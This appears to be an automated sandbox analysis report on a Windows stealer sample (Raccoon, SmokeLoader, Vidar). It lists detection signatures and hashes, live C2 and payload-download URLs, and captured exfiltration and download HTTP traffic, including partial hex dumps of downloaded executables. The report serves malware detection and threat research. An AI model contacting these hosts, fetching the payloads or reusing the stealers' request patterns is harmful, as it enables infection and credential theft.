Windows Analysis Report SkB6zJ6H3N.exe

Overview

General Information

Sample Name: SkB6zJ6H3N.exe
Analysis ID: 511734
MD5: b8d2d644a3ac5df8af9b3aff803f3347
SHA1: 062e29d59604956a4cffd64fc81cd1c3f72b0ff3
SHA256: c3f8d6b3e497471cc5e1526d59f7068f0655704f98dca59d79a77b81f1cb7fd5
Tags: exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://xacokuo8.top/ Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
Multi AV Scanner detection for domain / URL
Source: privacytoolzforyou-6000.top Virustotal: Detection: 5% Perma Link
Source: iyc.jelikob.ru Virustotal: Detection: 12% Perma Link
Source: mas.to Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\192F.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\319A.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\6DDE.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\75B0.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\86B8.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\8746.exe ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: SkB6zJ6H3N.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6DDE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7428.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cviueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8746.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\75B0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\319A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\89D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eviueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sfiueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8E8B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\192F.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 21.0.cviueca.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49829 version: TLS 1.0
Uses 32bit PE files
Source: SkB6zJ6H3N.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.7:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.7:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49850 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 192F.exe, 0000001D.00000000.392199023.0000000000417000.00000002.00020000.sdmp, sfiueca.7.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: 69B5.exe, 69B5.exe.7.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: 8E8B.exe.7.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000020.00000000.407285900.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.433249054.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.454048622.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.31.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: 8E8B.exe.7.dr
Source: Binary string: C:\moliyuwod_vofadarecayu\dezuvacux.pdb source: SkB6zJ6H3N.exe
Source: Binary string: cC:\moliyuwod_vofadarecayu\dezuvacux.pdb` source: SkB6zJ6H3N.exe
Source: Binary string: C:\lewusukoviv.pdb source: 7428.exe.7.dr
Source: Binary string: wntdll.pdbUGP source: 192F.exe, 0000001D.00000002.423561316.000000006A8F1000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: 192F.exe, 1105.tmp.29.dr
Source: Binary string: XC:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb` source: 32BC.exe.7.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: 69B5.exe, 00000021.00000000.408654637.0000000000401000.00000020.00020000.sdmp, 69B5.exe.7.dr
Source: Binary string: C:\lewusukoviv.pdb` source: 7428.exe.7.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: 75B0.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: 6DDE.exe.7.dr
Source: Binary string: C:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb source: 32BC.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: 6DDE.exe.7.dr

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49841 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49863 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.7:49863 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.7:49841 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://xacokuo8.top/
Source: Malware configuration extractor URLs: http://hajezey1.top/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/9f3868956801fb92fa090557a1edc6020dc838a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/7af57f772c6107cc1c44807ee6e54627588ad2f9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1410Host: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3c5ef2028f9a45f85119eb6cb39f21b264b252bf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3fa38023efb6f7516e4aff23353cd7c666085597 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1398Host: 194.180.174.181
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:29:51 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 13:29:02 GMTETag: "54600-5cf7dcf7c6721"Accept-Ranges: bytesContent-Length: 345600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 0c 03 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 03 00 00 c0 70 02 00 00 00 00 70 c7 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 b8 a1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 03 00 64 00 00 00 00 60 73 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 88 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 c7 03 00 00 10 00 00 00 c8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 65 6d 75 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 60 73 02 00 3c 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 a0 73 02 00 24 01 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:30:25 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 13:30:02 GMTETag: "93000-5cf7dd3163f4f"Accept-Ranges: bytesContent-Length: 602112Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 2c a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b2 07 00 00 c0 70 02 00 00 00 00 80 b1 05 00 00 10 00 00 00 d0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 78 02 00 04 00 00 40 ca 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 b6 07 00 64 00 00 00 00 50 77 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 02 88 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 78 b1 07 00 00 10 00 00 00 b2 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 d0 07 00 00 16 00 00 00 b6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 61 6c 61 6a 65 77 e5 02 00 00 00 40 77 02 00 04 00 00 00 cc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 50 77 02 00 3c 00 00 00 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 90 77 02 00 24 01 00 00 0c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:30:59 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:31:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 13:30:03 GMTETag: "d6200-5cf7dd31ce3c9"Accept-Ranges: bytesContent-Length: 877056Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed ff a0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e4 0b 00 00 c0 70 02 00 00 00 00 20 e3 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 6a 61 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 e7 0b 00 64 00 00 00 00 80 7b 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 94 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 0b 00 00 10 00 00 00 e4 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 63 69 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 80 7b 02 00 3c 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 c0 7b 02 00 24 01 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 